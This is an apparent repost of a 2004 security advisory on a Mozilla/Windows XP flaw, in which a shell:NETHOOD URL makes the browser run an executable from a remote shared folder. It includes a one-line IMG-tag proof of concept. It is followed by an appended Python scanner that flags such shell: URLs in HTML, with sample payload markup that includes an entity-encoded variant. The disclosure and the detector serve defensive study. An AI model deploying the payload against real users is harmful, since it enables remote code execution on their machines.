Shell code for remotely running an executable program
[START] Advisory
TESTED
------
MOZILLA("Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7) Gecko/20040616")
running on winxp.en.home.sp1a.up2date.20040709
PROCESS
-------
Victim visits a shared folder named "shared" on a server named "X-6487ohu4s6x0p".
This will create a shortcut named "shared on X-6487ohu4s6x0p" in the folder at "shell:NETHOOD"
At last, make MOZILLA request the following URL:
shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe
A file named "fileid.exe" in the "shared" folder will be executed.
REFERENCE
---------
MOZILLA will open/execute a file when navigated to a valid SHELL-protocol url:
http://seclists.org/lists/fulldisclosure/2004/Jul/0333.html
greetingz fly to perrymonj.
WINDOWS support "shell:NETHOOD":
http://does-not-exist.org/mail-archives/bugtraq/msg02171.html
thanks to malware for his additional research, and Cheng Peng Su for his
original discovery.
#########################
[START] PROOF OF CONCEPT
#######################
[IMG SRC="shell:NETHOOD\shared on X-6487ohu4s6x0p\fileid.exe"]
Source: http://666w.com/art/568.htm
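A defensive complement to the advisory above, as an added example that is not part of the original post: a Python scanner that flags `shell:` URLs in URL-bearing HTML attributes, the pattern the proof of concept relies on. The attribute list, the function and class names, and the sample markup (with the placeholder server name HOST) are assumptions constructed for illustration.

```python
from html.parser import HTMLParser

# Attributes that make a browser fetch or navigate to a URL (assumed list).
URL_ATTRS = {"src", "href", "data", "action", "background", "longdesc"}
# Scheme named in the advisory; extend for other local protocol handlers.
BLOCKED_SCHEMES = {"shell"}


def url_scheme(value):
    """Return the lowercased scheme of an attribute value, or None."""
    # Leading control characters and spaces are ignored by URL parsers,
    # and tabs/newlines inside a URL are dropped before it is parsed.
    cleaned = value.lstrip("".join(map(chr, range(0x21))))
    cleaned = cleaned.translate({9: None, 10: None, 13: None})
    head, sep, _ = cleaned.partition(":")
    valid = sep and head.isascii() and head[:1].isalpha() and all(
        c.isalnum() or c in "+-." for c in head)
    return head.lower() if valid else None


class ShellUrlFinder(HTMLParser):
    def __init__(self):
        super().__init__()
        self.findings = []  # (line, tag, attribute, decoded value)

    def handle_starttag(self, tag, attrs):
        line, _ = self.getpos()
        for name, value in attrs:
            if name in URL_ATTRS and value and url_scheme(value) in BLOCKED_SCHEMES:
                self.findings.append((line, tag, name, value))


def find_shell_urls(html_text):
    finder = ShellUrlFinder()
    finder.feed(html_text)
    finder.close()
    return finder.findings


# Constructed sample markup; HOST is a placeholder server name.
SAMPLE = (
    '<IMG SRC="shell:NETHOOD\\shared on HOST\\fileid.exe">\n'
    '<a href=" sh&#101;ll:NETHOOD\\x">link</a>\n'
    '<a href="http://example.com/?q=shell:test">ok</a>\n'
)

if __name__ == "__main__":
    for finding in find_shell_urls(SAMPLE):
        print(finding)
```

The parser decodes character references in attribute values before the scheme check, so an entity-encoded `shell:` is flagged as well, while a `shell:` string inside the query of an ordinary http URL is not.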